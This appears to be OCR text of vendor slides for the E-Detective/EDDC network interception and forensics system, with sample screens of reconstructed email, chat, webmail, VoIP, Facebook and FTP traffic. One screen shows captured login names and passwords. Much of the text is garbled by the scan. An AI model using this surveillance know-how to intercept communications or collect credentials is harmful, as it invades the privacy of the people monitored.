383. 2010-01-04 20:55:59 192.168.1.10 7 AddThis | teestrateaies' iss World 2 1 
382. 2010-01-04 20:55:33 192.168.1.10 сі | пера Ei 
381. 2010-01-04 20:55:30 192.168.1.10 E] blogs. str} 15 Vti sr hi ph hae fom vil tap nt gab t 
information creation to investigator knowledge to actionable ... 
380. 2010-01-04 20:55:30 192.168.1.10 IJ MiniRazq pestes peint inm к 
это, d па ЖАЛ ЖАЛАУ CEA AOD 4n d АА FI -*--1—!-5 4|  TeleStrategies' ISS World Americas - Intelligent Support Systems ... Y 
мч 123 mm Enter Page | EGLI Cc oe mee t Page 1 
www.issworldtraining.com/ISS WASH/ - Cached 
TeleStrategies' ISS World Europe - Intelligent Support Systems Гог... 
ISS World® Programs present the methodologies and tools to bridge the chasms from lawful 
О comilSS EUROPE) Cached nin 


Sample: Social Networking Sites - 


A M CASE RESULTS | E^ ЖЕ :M SETTINGS 


ES default | C8:0A:A9:F8:08:F1 FACEBOOK 


Facebook ә Wall © Chat © Game | Every Page | 20 
No. Date-Time Account User Handle Content Method ^ 
T. 2011-08-03 10:03:11 192.168.1.2 696045329 Profile | Wall GET 
2. 2011-08-03 10:00:50 192.168.1.2 696045329 Profile | Wall | Frankie Chan GET 
3. 2011-08-03 10:00:46 192.168.1.2 696045329 Profile | Wall GET 
4. 2011-08-03 09:59:53 192.168.1.2 696045329 Profile | Photos | Photos GET 
5. 2011-08-03 09:57:57 192.168.1.2 696045329 Profile | Wall | 865; & GET 
6. 2011-08-03 её — GET 
T. GET В 
8. 2011-08-03 СЕТ i 
9. 2011-08-03 ( Principal Solutions Architect at Decision GroupStudied at Nanyang Technological UniversityLives in Singapore, SingaporeFrom GET 
40: 20110803 Kuching, MalaysiaBorn on October 13, 1982@Add languages you knowEdit Profile GET 
11. 2011-08-03 GET 
12. 2011-08-03 GET 
13. 2011-08-03 GET 
14. 2011-08-03 GET 
15. 2011-08-03 GET | 
16. 2011-08-03 СЕТ 
17. 2011-08-03 GET a 
мч 12 MM Enter РА Frankie Chan likes a link. ye 2 Current Page 1 


Player Profesional Nak Pakai Baju Pon Susah | GelakJE! 
view.my 


Apa yang susah sangat nak pakai baju training tu?? ! HAHA!! 


Sample: HTTP Video Streaming 


(} HOME CASE RESULTS | %2 SYSTEM SETTINGS | Э SYSTEM STATUS | Е REGISTRATION 


ЖІ default | sq 00:24:21:A1:92:7F | Video Stream | 


"M Video Stream 


No Date-Time Account 


21. 
20. 


19. 


и«1 wmeEnterPage[ | бо | 


URI 


v16.Iscache3.c.... + 
r3.sin2.c.youtu... + 
v9.Iscache6.c. y... 4 
v19.lscache5.c.... + 
v24.Iscache6.c.... + 


r 


\20.15са 


У1015с4 


v3.Iscad 


v24 Isca 


\9.15сад 


v11.Iscá 


v15.Iscá 


v16.Iscá 


v13.Iscá 


9 player.swf (application/x-shockwave-flash Object) - " са | (в) 


http://192.168.1.12:888/general/common/ decode/http/ player.s 5-7 | 


=) 


——— =“ 


Hmm...Hacking Other 
Computers | See?? We'll 
it could be just that...(for 

info purposes only) 


l|, 00:15 mp 06:22 = ТЕП!) 
Transferring data from 192.168.1.12... Fiddler: Disabled 


Record/Page : Г 50 
File А 


16.28M 
2.70M 
1.56M 


12.87M 


m 


2.02M 


1.94M 


3.24M 


1.25M 


458.43K 


967.50K - 

340.99K 

693.27K 
5.80M 
6.00M _ 


21 Total Page 1 Current Page 1 


- sample: Voice over IP (VoIP) RTP.. 


fij Home: @ _ system serrines |. |ЕҘ system sra TUS | REGISTRATION | 


ә МОР " | Record/Page : [720] | Confirm | 


Date-Time Account S. Number D. Number Mode Type CODE‘ VOIP File 


4. a a 4 58 Sec 
3 a a 4 50 Sec 
2 я B " 1 Min 3 Sec 


IK 1 њи Enter Page | Total 3 Total Page 1 Current Page 1 


ҥг-+гї°©ї©Щ©ї©©©Ъ©Ыҥ+е_+ 


о 


Р 
File Download 


Do you want to open or save this file? 


Name: 8610044420 8610044421.wav 
WAV Type: Wave Sound, 301KB 
From: 192.168.1.60 


| А | mm | | xm | rcr 


While files from the Intemet can be useful, some files can potentially 
\ [72 2 harm your computer. Е tap do not trust the source, do not open or 
save this file. st 


Sample: HTTPS Username and 


= We 


Г = = 0 systemsertincs| ЕҘ systemstatus| [8 REGISTRATION 


Raw Data Set ID : 
Refresh | Case : default + Десоха/ Бәле E: 
N/A ы 
Di oe һә. ape n (ен А а m" мы Export 
Display by: ^ MAC ә IP — — Hanes Seah 


ІР! Ка d ыт 19 5 a € «686 vB tu “ta #9 MEDI MN b A 
192.168.6.23 0 0 0 0 0 о о о о о о о о о о о 10 0 0 0 0 0 0 10 
192.168.6.8 02:0 902070002: 50. 2105070250: ооо оо оо 0.0 0 о о 4 0 0 E 
192.168.1.132 0 0 о о о о о о о о о о о о о о о 0 0 о 0 0 3 о 0 3 
192.168.1.35 Ооо сте се обоего рибу ово з 503420707 70170270 0 1,254 
192.168.1.34 0 0 о 64 5 0 о 0 о о о о 0 о 0 0 01536 158 3 0 4 0 8 1,781 
60.250.163.131 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 о о 0 9 0 0 C 0 4 
10.0.0.11 0 0 о о о о о о о о о о о о о о о 13 0 1 0 0 0 0 014 
10.0.0.10 0 0 0 20202:0.20.505320230220 0170502000, 309 35717300070: о 0 492 
Me 1 мм Enter Page re Total 8 Total Page 1 Current Page 1 


fa номе! @ o Ж systemsettincs; ЕЗ systemstatus | [5 REGISTRATION 
2 default Д 192.168.1.35 | Account/password | 


$ Account/password - = - Record/Page : | 20 [ Confirm | | 
No. Date-Time Account User Password Server 

8. 2010-11-07 15:41:04 192.168.1.35 bobuuu ееее http-//signin.ebay.com.sg/ws/eBayISAPI.dll?co part 

T. 2010-11-07 15:40:16 192.168.1.35 wedetective2 jmyohxbc http-//login.yahoo.com/config/login? 

6. 2010-11-07 15:40:04 192.168.1.35 decisiongroup2010 jmyohxbc http-//www.google.com/accounts/ServiceLoginAuth 

3. 2010-11-07 15:24:00 192.168.1.35 decisiongroup2010 jmyohxbc http-//www.google.com/accounts/ServiceLoginAuth 

2. 2010-11-07 15:23:43 192.168.1.35 wedetective 1 jmyohxbc http-//login.yahoo.com/config/login? 

1. 2010-11-07 15:23:36 192.168.1.35 wedetective1 jmyohxbcdecision http://login.yahoo.com/config/login? 


мч 1 » n Enter Page Г] [Go | Total 6 Total Page 1 Current Page 1 


Sample: Incomplete Connections 


|_| http://192.168.1....n/frame/frame.php | + = 
Gy HOME CASE RESULTS | %2 SYSTEM SETTINGS | & SYSTEM STATUS | Е REGISTRATION 


38 Incomplete Records cord/Page : | 50 [Confirm |. 
No. Date-Time Source MAC Source IP Dest. IP S.Port D.Port Comment Incomplete Records 
1. 2010-01-04 18:34:58 00:24:21:А1:92:7Е 192.168.111 20317516236 1973 80 Lost HTTP Header INCOMPLETE_yKJsT9 dat 


i «1 »mEntrPage| | Go | 


File Search View Help praXoft 
> 

РА ә 
Address (Hex) Text (ASCII) 


Incomplete 55888546 НЕСЕТЕ БЕЕН 


images/stories/m 


00000050 Єр 2Е 

ti 00000060 6 єр odule/mapsandbro 
con nec ion 00000070 6 73 2D chures-02.jpg" а 
ш 00000080 7 Єр 70 7 lt-"mapsandbroch 
sessio ns Ca n be 00000090 20 ures-02.jpg" tit 
Е 000000А0 єр le-"mapsandbroch 
viewed by 00000080 2D 7 ures-02.jpg" hei 
000000CO 22 2 ght-"114" width- 
bi n a ry-text 000000D0 22 2F "140" /></а>.... 

000000Е0 76 20 «/div»... 
= 000000Е0 ec <div style-"cle 
VI ewe r 00000100 8 3E ar:both;"»«/div» 


00000110 
00000120 
00000130 
00000140 
00000150 


00000160 
4 


«/div». 


o 
Y о 


о 


«div 


o 


с1азз="с1еах"></ 


Ny NM NNA ~ 
o 


o 


N 
ы oF № 
о 
o 
п 


o 
о 
о 


div>. </div>. 


~ 
o 
оз 
~ 
о 


«/div». > 


о 
n 
~ 
D M 
о 
> 


/wrapper.. begi 


File Name: INCOMPLETE yKJsT9.dat | Size: 4,206 bytes 


Search - Free Text (Key Words) 


ала AOVar 8 
| || http/192.168.1...n/frame/frame.php | + | E 


@ HOME | ( CASE RESULTS | %2 SYSTEM SETTINGS | B) SYSTEM STATUS | Е? REGISTRATION | 


A default 


Case default M ” Record/Page | 50 | 50 [ Confirm | 


MM ЕТ 


Ед РОРЗ IMAP SMTP a е % 
192.168.1.11 T 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 15 
192.168.1.10 7 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 


Total 2 Total Page 1 Current Page 1 


ми 1»»EnerPage| | Go | Free Text (Key Words 


Search Parameters Search Category 

Date : 
Time : 
Source IP : 


Email Address : | . : й > ЕВС | Advanced 
— Search 


ice ы (Conditional 


P2P Tool: 


Lm Search) 


Game Name : 


Ш 


MSN Account: 2. 
User Handle | Participants 


ICQ Account : |2. 


User Handle [C Participants 


EB 


DECISION Y) /¢ 
> © 


Offline Packet 
Reconstruction Series 
E-Detective Decoding Center 


EDDC ог ино DE-TEME 
( ЕА) 


Introduction to EDDC 


* EDDC is a Unix/Linux based system specially designed for 
Manual Offline raw data (PCAP) files reconstruction. 


* |t allows Administrator to create different project/case for 
different user/investigator (with different level of authority) 
to conduct Internet raw data parser and forensics analysis 
task on the system. 


* The system is able to reconstruct Internet application/services 
like Email (POP3, SMTP, IMAP), Webmail (Yahoo Mail, Gmail, 
Hotmail etc.) IM (Yahoo, MSN, ICQ, QQ, UT, IRC, Google Talk, 
Skype Voice Call Log), File Transfer (FTP, P2P), HTTP (Link, 
Content, Reconstruct, Upload/Download, Video Stream), 
Telnet, Online Games, VoIP (Yahoo), Webcam (Yahoo, MSN). 

* EDDC can be used by all group of users who wish to view 

the content of the network traffic with pre-captured raw data 

files. It is designed for private and public sectors users. 


User/Case Management - Offline Internet Raw Data 
Parser/Reconstruction - Search Function - 


EDDC Application and 


Implementation Diagram 


Offline Raw Data Decoding and Reconstruction system. 
Comes with User and Case Management functions. 2, 


Collect, 
Import 


ЈЕ Raw Data |=. | 

"ds r Case 1 aA =: 

Investigator 1 а= 
Саѕе 1 Case 1 Results 
: — == 


пц! 


rr nbi 


| 
| 
| 


EDDC/XDDC M oo AERE 
Collect, Case2 “А ==: : ЕЕ 
Import He LE Е 
Investigator 2 Raw Data =: ЕЕ 
Case 2 For Case 2 £ — 
Case 2 Results 


Reconstruct various Internet Protocols/Service Types 


Introduction to EDDC-LEMF (1) 


% As a lawful interception solution for parsing 
PCAP file format or raw packet data stream 
from frontend mediation platforms or 
broadband service routers. 


* Decoding all data packets associated with 
protocol based on service port number and 
session. 


* Saving un-decoded data into specified 
directory in PCAP format. 


** Output decoded data into database and 
associated multimedia files with XML files in 
predefined way. 

* Compliance with ETSI TS 101 671 and ETSI 
ES 201 671. 

УМДҲСҲСҲСММ ө... ЛМ 


Introduction to EDDC-LEMF (2) 


* Input data will be: 
" XML description file and PCAP files 
" Data stream (must specified in advance) 


** АП output data will be saved or processed by 
case ID 


* FTP server and client services launched 
* Case management interface 


* Lawful enforcement management utility for 
cyber investigation (LEMF) 


Implementation of EDDC-LEMF 


Telecom, 
International 
gateway 
station or 


Optional 


== 
Optic fiber SS = 


МА ылгын =" аша) Data Retentio 
pcap data to Mediatio Management 
Mediation n System with 
Platform Platform Multiple 
. Connection: / \ ED/LEMFs - mE 
- FTP нн POS 
- Directory Tree КЕЗЕ: | 3 | 
- File Name Convention ED/LEMF { 
- XML description file System 
- PCAP Files upload 
Analysis Server (Data Minin: 
2. System: „ 
-FTP with Mediation 3. Connection ; 
Platform -FTP 


-Case ID Management 

-Web -based Lawful 
Enforcement Management 
Utilities and System 
Administration 


са R-mr Г. 


EDDC Dashboard/Homepage 


dr Favorites б admin (Admin) m + [3 @ v Раде“ бух Тоок» @- ” 


Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup Download or Burn ISO Logout | 
Case Name: default ~ Raw Data Import Filter: N/A Y Import Record | Build Backup ISO | 


: Total Throughput Statistical Report “|. 
Top-Down View Report Online User List 


( 2009-06-18 18:34:31) 


Daily Traffic Weekly Traffic Total Traffic 
Земсе Category 2009-06-18 2009-06-11 ~ 2009-06-18 
Quantity Throughput Report Quantity Throughput Report Quantity Throughput Report 
Summary 222  93341KB ii, 250 93,700 КВ |, 13,951 390,555 КВ |І, 

“а POP3 0 окв |І, 0 окв |І, 66 — 16043K 

Ф IMAP 0 OKB lih. 0 - 
EMAIL < SMTP 0 OKB | 0 | 

0 окв |І 0 


(са Webmail(Read) 


әр С ACCOUNT User All Traffic Topn | Statistical Report List 


Throughput Statistical Report 
192.168.1.142 Whois? 115,532 КВ Protocal | бә | Weekly J Summa] е Throughput Statistical Report 
192.168.1.33 Who is ? 102,766 KB Protocal Daily Weekly | Summary — 
192.168.1.10 Who is ? 96,256 КВ Protocal Daily Weekly | Summary 
192.168.1.11 Who is ? 32.401 KB Protocal Daily Weekly | Summary 
192.168.1.9 Who is ? 31,845 KB Protocal Daily Weekly | Summary 


= 
© 


Фо ч Oc о RC) мо = 


КЕЕ ЕЕ ЕЕЕ ЕЕ ЕР 
| 


192.168.1.179 Who is ? 9.905 KB Protocal | _ Daily Weekly | Summary ІШ 
192.168.1.132 Who в? 951 KB Protocal | — Daily Weekly | Summary 
192.168.10.10 Who is ? 359 KB Protocal Daily Weekly | Summary ТІМ 
192.168.1.13 Who is ? 284 KB Protocal | — Daily Weekly | Summary ІШ 
66.94 230.122 Who is ? 210 KB Protocal Daily Weekly | Summary 
68.142.233.22 Who is ? 46 КВ Protocal | Оайу Weekly | Summary ІШ 
192.168.6.8 Who is ? 0KB Ргоюса | Daly | Weekly | Summary ІШ 25 122 052 КВ 
FILE TRA 2423.70.11 Whois ? 0KB Protocal | ау ] Weekly | Summary "mw 


12 48,701 KB 


60.250.163.131 Who is ? 0KB Protocal Daily Weekly | Summary 
220.141.42.6 Who is ? 0KB Protocal Daily Weekly | Summary 


192.168.6.23 Who is ? 0 KB Protocal Daily Weekly | Summary 


Sample Reconstruction: Email 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Маше: default ~ Raw Data Import Filter : N/A v Import Record | Build Backup ISO | 
A 
REPORT [E-MAIL [CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION | OK 
[f2 РОРЗ - | Every Page| 10) 
№. 9 Date-Time Account Sender Receiver сс Subject Login Password 
26. Q “.. 192.168.1.11 frankie.decision()gma. JB m UN finds world economic inse... ѕиррой@ес — eddecision: 
25 20080792 192468111 wedetective2@hotmail ‚ЕЕ " Africa support@e — eddecision; 
24. 0 EE 192 168.1.11 fransyinmy(Qyahoo.com LIMEN support@ed Bragil's new drunken dri... supporte. — eddecision: 
2008-07-02 B ; генде 
23. 10:28:43 192.168.1.11 support@ed-system.sg Support Q  r«o:7192 168112/9ne Sl Cmm Vshow msg php? PROG=mail mail msg php& IDX-ZA&T SQLI -Select - Windows Intemet Explorer Ee eddecision: 
2008-07-02 B E E "== = - E : РЕНИ 
22. 10:28:43 192.168.1.11 sharonneujsm.com list@neu 24 Brazil's new drunken driving law stirs discontent | eddecision: 
2008-07-02 в Subject Brazil's new drunken driving law stirs discontent п а. 
21 10-28-43 192.168.1.11 support(Jed-system.sg 5иррога) | жам те eddecision: 
20 20080702 _ 4s) 168111 gandong2004@mail hua. г Б невен ©  eddecision; 
10:28:43 g g Ча... enquiry - Rapports systems a 
19. и 192.168. (аа лала мес eR oe ЗЛЕ па = —— ] | eddecision: 
2008-07-02 ae ту || Sar 
ж 10:28:43 TEN. пратити БЕ eddecision: 
17 2008-07-02 192 168 BRASILIA - POLICE have arrested hundreds of Brazilian drivers und i ivi ision: 
Ф 6 қ - е arre: rs under a tough new law designed to crack down on rampant drunken driving, but bar — eddecision: 
10:28 43 rt owners are working to overturn the measure and many of their clients are flouting it. " 
мч 1 2 34 5 6 a » № Brazil has some of the world's most dangerous roads, with 7 deaths per 10,000 cars each year, compared to опе or two deaths in most European ‘urrent Page 5 


countries, according to the Brazilian Association of Traffic Medicine. 
An estimated 45 per cent of those 36,000 annual deaths are due to drinking. the group says. 


The law, which took effect on June 20, effectively bars drivers from drinking and imposes stiff fines. One beer is enough to exceed the new limit of 0.2 
decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. 


Violators face at least а 1755600 (55818) fine, a one-year suspension of driving privileges and temporary impoundment of their cars. 
Heavy drinkers can be imprisoned. 


In 10 days federal police, who monitors the country's main highways, have arrested some 300 motorists and fined many more even though experts say 
they are undertrained, underfunded and underequipped. Some states only have a handful of breathalysers. 


Done @ Internet | Protected Mode: Off fay 910% ~ 


@ Internet | Protected Mode: Off fg R10% ~ 


Sample Reconstruction: Email 


Case Results 


Case Маше: default ~ Raw Data Import Filter: М/А 


№. 9 Date-Time Account Sender Receiver cc BCC 
2008-09-22 Б | | 
90 09:15:43 flyy flyyGdecision com tw edetective@163.com king0613@y. 
8 2008-09-22 fl B : t decisi 
| 09-11-24 уу flyyGdecision.com.tw vincentyao@decision.... 
2008-09-22 : - 
700! 09-08-35 vic vic@decision.com.tw flyy@decision.com.tw.. 
2008-09-22 р 24 
5 0 09:07:55 мс vic@decision.com.tw flyy@decision.com.tw 
2008-09-22 : B - 
5. 0 09-07-35 міс vic@decision.comtw "УУ Gdecision.com.tw... 
2008-09-22 si 
4 09-03-04 реег peter decision.com.t... flyy@decision.com.tw... 
2008-07-02 - B - 
3. 0 10:34:01 decision decision(Qed-system s... decision(Qed-system.s... support@ed... 
-07- ЦЕ Б 2 
2 в 205058 оп — qecisonQeteyemau desinere mS = 
1. 6 2008-07-02 decisi a ais а: а warum 
| 10:30:18 ecision бесїзїоп@ей-у| = mim fme. e 
мч 12 им Қазен = 
(Ге Download =s] = | Beatas 
Do trt vent te even ет fere tm Me — - 2008-07-02 18:33:24.0 
B pus аа не 8 Document, 513... — Attachment Customer Request Form doc 
From: 192.168.112 - = ue = 


GAME HTTP TELNET VOIP SSL FUNCTION 


REPORT CHAT FILE TRANSFER SSL 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Вит ISO | Logout | 
ы Import Record | Build Backup ISO | 


OK 


Every Page| 10][ Confirm | 


Сен) (ве) Се ) 


[V] Aways ask before opening this type of fle 


Captured 


Mie ie rn the emet can be unl SCENES 
д = ‘computer. f you do not trust ће source, do not 
save ifi Уш What's the risk? 


New York City restaurants go trans-fat-free 
NEW YORK - ONE New York City chef spent a year mastering a trans-fat-free version of his sfogliatella pastries. Boston Market 
restaurants have introduced a trans-fat-free chicken pot pie in New York before taking it to other United States cities. 


All that work was in preparation for New York City's ban on trans-fats in restaurants, which took full effect on Tuesday, and is the first of 
its kind among major US cities. The move follows the city's 2003 ban on public smoking. 

Artificial trans-fats give french fries their crunch and pie crusts their flakiness and chefs have been figuring out how it was done before 
trans-fats came into wide use during World War Il, when margarine became a substitute for rationed butter and Crisco became a 
‘staple in US kitchens. 


Artificial trans-fats, which also are known as partially hydrogenated vegetable oil, have just as many calories as other fats but clog 
arteries in the same way that saturated fats like butter and lard do. 


A year ago, New York restaurants were banned from using the artery-clogging fats in cooking oils and spreads. On Tuesday, all trans- 
fat products were banned, although the city will allow a grace period before issuing fines up to US$2,000 (S$2,700). 


Ms Laura Stanley, a former senior editor for Martha Stewart Living Omnimedia who heads the city's Trans-Fat Help Center, a clinic to 


Done 


Ө Internet| Protected Mode: Off 


а- Aos > 


Subject Login Password 

RE: 01погіһегп lights 
found ЗЕФЕЈВЕ N/A N/A 
ЗАНУ: 59 АН. МА МА 
Fw: 06Ыоск fr 8 

w: ОбЫоск from-&mj SEI N/A 
ЕЕ 
Fw: 04other information-z& N/A N/A 
Нер... 
Fw: 03serious сопайїоп-® N/A N/A 
EHER STR... 
ЕЕ. N/A N/A 
MY Email N/A N/A 
New York N/A. МА | 

МА МА 


Total 19 Total Page 2 Current Раде 2 


Sample Reconstruction: Webmail 


Read 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


Case Маше: default ~ Raw Data Import Filter: N/A X Import Record | Build Backup ISO | 


REPORT [Е МАЮ] CHAT FILE TRANSFER GAME HTTP TELNET vOIP SSL FUNCTION аж 
Webmail Token Analyzer Every Раде | 10 Солт | 
No. 0 Date-Time Account Sender Receiver сс Subject Webmail Type 
21 2008-07-02 10:26:46 192.168.1.1  wedetective2@hotmail.... frankie десі... Ij m GMail 
18 2008-07-02 10:24:00 192.168.1.11 pics for you to smile Windows Live 
17 2008-07-02 10:23:49 192.168.1.11 Human genome changes with age Windows Live 
16. 2008-07-02 10:23:44 192.168.1.11 FW: Auditing Tool Windows Live 
15 2008-07-02 10:23:27 192 1681.11 T a и 
13. 2008-07-02 10:21:12 192.168.1.11 registrationyyoutube... fransyinmy@y.. a Clip Extractor YAHOO2.0 Mail 
12. 2008-07-02 10:21:12 192.168.1.11 support@ed-system.sg fransyinmy@y... support@ed... 4 oo * increase flights YAHOO2.0 Mail 


11. 2008-07-02 10:21:12 192.168.1.11 = 2 je.de -Th jying party YAHOO2.0 Mail 
EE 


= o olo isis 

9. 2008-07-02 10:21:07 192.168.1.11 || - | i soi M'sia tolet — v, 56 ман 
FROM : registration@youtubeclipextractor.com ger retum... 

жє 123456789 м ATE / TIME : 2008-07-02 10:21:12 otal 88 Total Page 9 Current Page 8 


ТО: тапзупту(фуаћоо.сот 
SUBJECT : Your YouTube Clip Extractor registration 


Hi frank, 

be sent direcily to the page сойтш уош registration and your software will be activated. To activate 
YouTube Clip Extractor, please click here now. 

Enjoy -). 


The YouTube Clip Extractor team 
http://www. YouTubeClipExtractor.com 


@ Internet | Protected Mode: Off Фа " Q10% ~ 


Sample Reconstruction: Webmail 


Case Management| Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Вит ISO | Logout | 
Case Name: default ~ Raw Data Import Filter: М/А X Import Record Build Backup ISO 


е, 
REPORT [E-MAIL] CHAT FILE TRANSFER GAME НТТР TELNET VOIP SSL FUNCTION OK 
Er Webmail Set Every Pagel отт | 
No. @ Date-Time Account Sender Password Receiver Et BCC Subject iren 
2008-09-22 B р НЕ ar eee р | 
88. O 09.54.24 192168110 diesis ис@тза hinet. vic decision... Fw: FW : AAPO ИЕС... HiNet Mail 
2008-07-02 B ae ) 
= 10-28-17 192-168-111 папке decision@gma... decision@ed-... Bush GMail 
84. 0 Е 192.168.1.11 Je support@ed-s... UN finds world economic insecurity ... GMail 
2008-07-02 - ' 
э 10:25:28 192-168.1.11 detective? hotmail... support@ed-s... Afgfa Windows Live 
19. ij p 192.168.1.11 ыы frankie.deci... М agency hails green energy 'gold ... ^ Windows Live 
20 08 -0 7-0 2 а | е up Pg uenerat ET OS АЫ СЫН - Windows Internet Explorer. (Se) р р р 
ыы 10:22:16 192.168.1.11 fransyinmy@yahoo.com ui = rps оживи 5 2 и] at Irish mi.. УАНОО2.0 Май 
84 UN finds world economic insecurity among rich, poor а Fürst... [. Previous...) [.... Nena... а... | Bookmark, 
мч 12 м FROM: frankie.decision@gmail com | Page 2 Current Page 2 
DATE / TIME - 2008-07-02 10:27:24 
Г File Download = d 


Be ATTACHMENT : |‘ 9^9 


UNITED NATIONS - RICH and poor nations have more in common this year: a growing sense of economic insecurity. 


Do you want to open or save this file? 


— Name: SIAjpg 
[ Type: JPEG Image, 23.2KB 
From: 192.168.1.12 


( oen || Sw |( Саса ) 


Their shared anxiety is largely due to 'trade shocks' from rising oil and food prices, rattled financial markets, natural disasters and armed conflicts, 
the UN said in its annual survey of world economic and social trends, released on Tuesday. 


Аз usual, though, it's the impoverished who fare worse 


"The food riots that broke out in a number of countries in early 2008 have laid bare the fragility of economic livelihoods for those at the bottom of 3 
the development ladder,’ the report says. 


Mr Sha Zukang, the U.N. undersecretary-general for economic and social affairs, suggests nothing less than 'a global New Deal or Marshall Plan- 
like approach to help the world's poor, especially the 1 billion people who live on less than USS1 (S$1.36) a day. 


a 7 While files from the Intemet can be useful, some files can potentially 
gQ harm your computer. If you do not trust the source, do not open or 
save this file. What's the risk? 


Under that plan, nations would set aside cash grants that nations could pay to each household, something along the lines of the dividends paid to 
Alaskans each year since 1980 from oil and gas money. 3 


"Such measures are, of course, fraught with complications and difficulties,’ he says in the report. 


"And asking at what level and with what resources this could be pursued as part of a wider security agenda remains an abstract policy point’ 


The report lists 35 nations that need help because of a food crisis - led by Iraq, Zimbabwe, Swaziland, Somalia and Lesotho. In these nations, food 
insecurity is greatest because of drought and windstorms or floods and, in some areas, fighting. 


Done @ Internet | Protected Mode: Off fg v %100% + 


Sample Reconstruction: IM - MSN 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Маше: default у Raw Data Import Filter : N/A ” Import Record | Build Backup ISO | 


REPORT E-MAIL |СНАТ| FILE TRANSFER GAME HTTP TELNET УОІР SSL FUNCTION QU 
3: мэм] Every Page| 1 Сопіт | 
No. Date-Time Account User Handle Participants Conversation Count 
5 ii) peccet 192.168.1.33 shmily.d0613(gmsa.hinet.net diesis(2ms62 hinet.net Conversation 48 
4 Ш = 192.168.1.33 shmily.d0613@msa_hinet.net philip12129@hotmail.com Conversation 12 
3 — 192.168.1.33 shmily.d0613@msa_hinet.net dick691111@yahoo.com.tw Conversation 28 
2 d potis 192.168.1.13 wedetective@hotmail.com wedetective2@hotmail.com Conversation 1 
10 peg 192.168.1.11 wedetective2@hotmail.com wedetective@hotmail.com Conversation 9 
мч 123 м 


Page 3 Current Page 3 


@ https//192.168.1.12/general/common/show. msg.php? PROG-msn/msn msg.php& IDX-1&T SQL1-Select?620. - Windows Intern... = 


1 wedetective2@hotmail.com - wedetective@hotmail.com = 


Ж Date-Time: 2008-07-02 10:43:23 | User Handle: wedetective2@hotmail.com 


. Date-Time User Handle Message 
| pe wedetective2@hotmail.com ^ helo 

- oe wedetective2@hotmail.com how ru? 

К perg wedetective@hotmail.com hi 


1 peti wedetective@hotmail.com 1 am fine 


я Bory wedetective@hotmail.com thanks! 


File "ENS File Size ^ 


2008-07-02 
- 10-43-54 wedetective2@hotmail.com MSN 68.7K 


2008-07-02 2008-07-02 10:44:26 ~ 
7T. 404425 Wedetective2@hotmail.com 598 07.02 10:44:46 MON 


21320. — 
Total 9 Total Page 2 Current Page 1 
@ Internet | Protected Mode: Off Фа 7 100% + 


Sample Reconstruction: IM - YAHOO 


Case Results 


Case Name: default ~ Raw Data Import Filter: М/А 


Ё vano] ^ Download Too! 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
v Import Record | Build Backup ISO | 


No. 0 Date-Time 

@ 2008-09-22 09:40:13 
@ 2008-09-22 09:40:13 
2008-09-22 09:15:36 
2008-07-02 10:41:50 
2008-07-02 10:41:36 
2008-07-02 10:40:51 
2008-07-02 10:40:42 
2008-07-02 10:40:06 
2008-07-02 10:40:05 


= N WP юл бф ч о о 


Account 
192.168.1.9 
192.168.1.10 
192.168.1.10 
68.142 233.22 
68.142.233.22 
66.94 230 122 
66.94 230 122 
192 168.1.11 
192 168.1.13 


OS 


Every Page :[10_][_Confrm_] 


User Handle Participants 
superuserdemo diesis2k5 
diesis2k5 superuserdemo 
diesis2k5 test3@decision.com.tw 
wedetective1 wedetective2 
wedetective2 wedetective1 
wedetective1 wedetective2 
wedetective2 wedetective1 
wedetective1 wedetective2 
А € https//192,168.112/general/common/show-mag.php? PROG-yahos/yahoc пад РПРВ IDX-2&T SQL1-Select - Windows Intemet Explorer 
wedetectivez эр : E 
а тате ит Риз J| Prewous |, Nex | Last .. 
3 Date-Time : 2008-07-02 10:40:06 | User Handle : wedetectivet Every Page :[_20][ Confirm 
No. Date-Time User Handle Type Message Time started Finish Time 
1 208002 wedetective Message helo 
2 20080102 wedetective2 Message good moming 
з 2000102 wedetective2 | Message howru? 
4. 008042 wedetectivet Message hi 
5 EA wedetectivel | Message Iam fine 
6. 20080102 wedetectivel Message thank you 
2008-07-02 ч 
qe D wedetectivet File \ 6 
Ew 
а 200807502 wedetectivet File Customer Request Form pdf 
9. 20080702 wedetecüivei Message thank youll! 
ло 20080702 wedetective2 Message welcome 
2009-06-18 2008-07-02 2008-07-02 
11. 130904 — bc © 104156 10:42:13 
2009-06-18 2008-07-02 2008-07-02 
акы ee We © 104136 10:42:13 
2009-06-18 2008-07-02 2009-06-18 
1. “130907 — л» (б 104102 12:11:05 
2009-06-18 2008-07-02 2009-06-18 
М. 130907 mind лю Ө 104102 12:11:06 
2009-06-18 2008-07-02 2009-06-18 
18. "0907 — Шы e 10:41:02 12:11:05 
M«1»» Total 15 Total Page 1 Current Page 1 
Done @ Internet | Protected Mode: Off fav R10% + 


Conversation Count 
Conversation 13 
Conversation 13 


Conversation 5 
Conversation 1 
Conversation 1 
Conversation 2 
Conversation 2 
Conversation 15 
onversation 15 


T Page 1 Current Page 1 


Sample Reconstruction: File 


Transfer (FTP 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


Case Маше: default ~ Raw Паја Import Filter : N/A 


REPORT E-MAIL CHAT [FILE TRANSFER [GAME HTTP TELNET VOIP SSL FUNCTION 


> Import Record | Build Backup ISO | 


OK 


Every Page :[ 10] Сопіт | 


2008-09 


09:20:47 


2008-07. 


10:36:22 


2008-07 


10:36:14 


2008-07 


Date-Time 


Account Username Password Action 
= 192.168.1.10 vic мс Download 
I 192.168.1.11 anonymous lEUser@ Download 
у 192.168.1.11 anonymous IEUser( Download 


-02 409 4с0 4 44 


FTP Server IP 


192.168.1.249 


64.7.210.151 


64.7.210.151 


File Name 


